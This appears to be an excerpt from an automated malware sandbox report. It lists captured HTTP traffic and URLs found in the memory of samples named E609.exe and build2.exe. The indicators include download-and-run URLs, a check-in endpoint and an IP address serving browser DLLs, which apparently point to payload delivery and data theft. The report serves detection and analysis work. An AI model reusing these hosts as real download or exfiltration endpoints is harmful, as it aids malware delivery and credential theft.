Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc ab 15 b0 08 db 6f a7 18 5c 9b 08 bf eb 3b af 2d 50 0a f3 dd c6 5b ee 52 c6 41 83 aa 76 d2 26 eb b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 41I:82OTeo\;-P[RAv&~0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 39 41 a3 e8 dd e1 f8 5f f5 4a 89 2d bb 53 51 90 4a fb ef 2c f3 2b 42 1a ae b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OI9A_J-SQJ,+BW0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:30:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 63 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 53 da 46 d4 f7 20 86 24 e6 ad 90 52 23 e5 b4 4c 2b f8 a5 b4 6a f6 99 bc 5d af 72 94 cb 32 45 5d 39 0f 4e df a1 3d fd d4 55 84 ac c8 42 c6 36 9d 95 69 77 64 f9 7a 3a 9c c6 9d c6 76 ed 39 08 84 5a b0 4d e3 e6 d3 36 81 c7 fc 3f d7 38 f9 fb 91 e0 01 83 c4 c3 4c 1c c3 03 ae eb b4 c0 a9 ac 4f 1c ff 74 88 d8 29 82 7b 32 45 b6 88 f9 b7 ae 1a b1 4b 64 c0 c6 ba e2 d9 ba 78 d6 27 35 60 3a 6a e8 81 03 9d 78 ab a8 af 2d 90 d6 d7 44 0d 0a 30 0d 0a 0d 0a Data Ascii: c1I:82OB%,YR("XSF $R#L+j]r2E]9N=UB6iwdz:v9ZM6?8LOt){2EKdx'5`:jx-D0
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe$run
Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe$run(
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe$rund
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0
Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exe?
Source: E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/files/1/build3.exerun
Source: E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2086702511.000000000076C000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000753000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php
Source: E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueZ
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueb
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=truep
Source: E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637c
Source: E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.phpenh
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2734568138.000000000D007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2734568138.000000000D007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1689675941.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1690859356.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1689226860.0000000007F40000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exe
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
Source: E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exerun5980
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: E609.exe, 0000000F.00000003.2126285857.0000000009840000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.amazon.com/
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: E609.exe, 00000011.00000003.2126495485.0000000003570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: E609.exe, 0000000F.00000003.2126555121.0000000009840000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.live.com/
Source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: E609.exe, 00000011.00000003.2126716894.0000000003570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.nytimes.com/
Source: E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: E609.exe, 0000000F.00000003.2126709109.0000000009840000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.reddit.com/
Source: build2.exe, 00000013.00000002.2691159740.000000001DDFD000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: E609.exe, 0000000F.00000003.2126992854.0000000009840000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.twitter.com/
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: E609.exe, 00000011.00000003.2127708531.0000000003570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.wikipedia.com/
Source: E609.exe, 0000000F.00000003.2127702492.0000000009840000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59
Source: build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2354099315.00000000008A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/%LB
Source: build2.exe, 00000013.00000003.2353603355.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342899375.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2341806768.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342259804.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342809334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342138297.00000000008A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/.
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/:
Source: build2.exe, 00000013.00000003.2341998705.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2341806768.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2340668890.00000000008FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/AFHI
Source: build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/I
Source: build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/Z
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/d
Source: build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/f
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dll
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dll/d
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dll5d-
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dllSd
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dllYd
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/i
Source: build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/j
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dll
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/msvcp140.dll
Source: build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dll
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dlla
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dllppData
Source: build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dlly
Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/pe
Source: build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/r
Source: build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/rosoft
Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/rpriseCertificates
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/s
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sf
Source: build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dll
Source: build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dll3e
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dllqd
Source: build2.exe, 00000013.00000002.2651384676.000000000052E000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sqls.dll
Source: build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/tography
Source: build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dll
